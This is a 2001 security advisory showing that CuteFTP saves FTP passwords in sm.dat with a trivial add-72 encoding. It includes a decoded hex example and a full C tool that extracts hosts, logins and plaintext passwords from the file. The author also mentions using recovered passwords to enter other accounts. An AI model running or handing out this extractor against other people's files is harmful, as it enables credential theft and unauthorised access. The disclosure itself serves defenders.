============================================================================
 Securax-SA-21                                              Security Advisory
 belgian.networking.security                                            Dutch
 ============================================================================
 Topic:          CuteFTP uses a weak password encoding scheme
 Announced:      2001-08-01
 Affects:        CuteFTP 4.2.4 and below. (but not to low)
 ============================================================================

 Note: If you happen to find more information, solutions, ... about the below
       problem  or further  varients please contact me on the following email
       incubus@securax.org, or you can contact the  Securax crew by e-mail at
       info@securax.org.

 I.  Problem Description
 -----------------------

 Globalscape's  CuteFTP  is a  popular FTP  client.  It is used to connect to 
 remote ftp servers.  CuteFTP has a kinda "Address book" which stores info on
 several FTP servers, such as hostname, login & password (basically the stuff
 you need to log in.. :)).

 In any case, CuteFTP uses a very weak encryption scheme, it adds 72 (hex 48) 
 to the plaintext password.   So , Globalscape uses a kinda ROT-72 encryption
 scheme 

 Let's get down and dirty, technical that is..  How are the passwords stored?
 Well, they are stored in a file called "sm.dat".  I'll give you an example: 
   
 This is a part of the hex dump of my sm.dat:
   
  08 31 30 2E 30 2E 30 2E 33 05 41 64 6D 6D 69 05 BC AD BB BB A9
   ^                          ^                 ^
   |  - hostname (10.0.0.3) - |  -   login   -  |  - encoded pw -
   |                          |                 |
   |___ len(hostname)         |__ len(login)    |__ len(password)
  
 The password is BC AD BB BB A9,  but  if you substract each character by 48,
 you'll see: 74 65 73 73 61, which is "tessa".
 
 So you probably can see, there is a user "Admin" , with a password ("tessa")
 on box 10.0.0.3.
   
 Cute(ftp) isn't it?


 II. Impact
 ----------

 No, you won't be able to r3wt th3 pl4n3t with this, But it gave me access to
 several other accounts, because ftp and shell passwords are often the same.
 
 But instead of letting you calculate the password.. here's the code:
 
 --| BOF: cuteftpd.c |-- 
 
 /* 

   CuteFTPd: a CUTE Fucking Too easy Password Decrypter
   ----------------------------------------------------

   This code was made on a hot and sunny afternoon, (as we got many of em in
   belgium).  So, don't shoot me if some things won't work.  I've found some 
   problems when your login is 11 (0x0A) of 13 (0x0D) chars long... but what 
   the hell.. fix it.
   
   This program is dedicated to Peter "DC" De Coninck, a good friend of mine
   who passed away in April.  DC, I miss you, thank you for everything, take 
   care man.
   
   All my love to Tessa, I love you forever, always, every day of my life, 
   please marry me.  I love you, i need you. please, be mine forever.
      
   Respect to all the great ppl at #securax@irc.hexyn.be: U know who i mean, 
   and who i don't mean. grmBL. ;)
   
   To Reggie: happy birthday!! =)

   Take care,
        incubus <incubus@securax.org>

   ps: this code sucks, i know.
   
 */ 
 

 #include <ctype.h>
 #include <string.h>
 #include <stdio.h>
 #define banner "\n-] CuteFTP password retrieval tool\n   -------------------------------\n\n"
 #define usage  "   usage: %s <path_to_sm.dat>\n\n"

 int main(int argc, char **argv)
 {
    FILE *list;  unsigned char c, p, t;
    unsigned char host[128], un[128], ep[128], dp[128];
    int i = 0;

    printf (banner); 
    if (argc < 2){ printf(usage,argv[0]); exit(1); }
    if ((list = fopen(argv[1],"rb")) == NULL){ 
    perror("error opening file"); exit(1); }

    while (!feof(list)){  
    c = fgetc(list);
    if (c < 48){
  i++; p = fgetc(list);
  if ((islower(p))||(isupper(p))||(isdigit(p))){
      host[0] = p;
      for (i=1; i<c; i++){
    t = fgetc(list); if (t != 13)    
    if (!((t < 48) && 
         (!isspace(t)) && 
         (t!='.') && (t!='-') && 
         (t!='_'))) host[i] = t;
    } i = 0;
      if (strchr(host, '.')){
    printf ("-] %s\n---]  login:", host);
    i = strlen(host); p = fgetc(list);
    if (p == 0) printf ("anonymous\n\n");
    else{
        memset(un, 0x0, 128); un[0] = p;
        for (i=0;i<p;i++){
      t = fgetc(list);
      un[i+1] = t;
      }
        printf ("%s\n      password: ",  un);
        p = fgetc(list); memset(ep, 0x0, 128); memset(dp, 0x0, 128);
        for (i=0;i<p;i++){ t = fgetc(list); ep[i] = t; }
        for (i=0;i<128 ;i++){ if (ep[i] != 0x0){
          dp[i] = ep[i] - 72; printf ("%c", dp[i]); 
      } }
        printf ("\n      hex: ");
        for (i=0;i<128 ;i++) 
                    if (dp[i] != 0x0) printf("0x%2x ", dp[i]);
        printf ("\n\n");    
        }
    }
      }
  }
    memset(host, 0x0, 128);
    }
 putchar(10);
 exit(123);
 }

 --| EOF |-- 


 III. workarounds
 ----------------

 There's this nasty option which allows you to encrypt  your sm.dat file, but
 let's take a look at that and see where and how that password is stored.. =)
 
 Other workarounds: don't save passwords in cuteftp, but remember 'em, or use
 another ftp client, OS, ...
 
 
 IV credits
 ----------
 Alls my love to Tessa.
 Respect: f0bic, F_F, r-dude, t-omicr0n, tosh, senti, zym0, vor, cic, primus,
 virtual, necro, ares, ... and so on, you know who you are.
 
 take care,
 
 -- incubus (incubus@securax.org).
 
 ============================================================================
 For more information                                     incubus@securax.org
 Website                                               http://www.securax.org
 Advisories/Text                                  http://www.securax.org/pers
 ----------------------------------------------------------------------------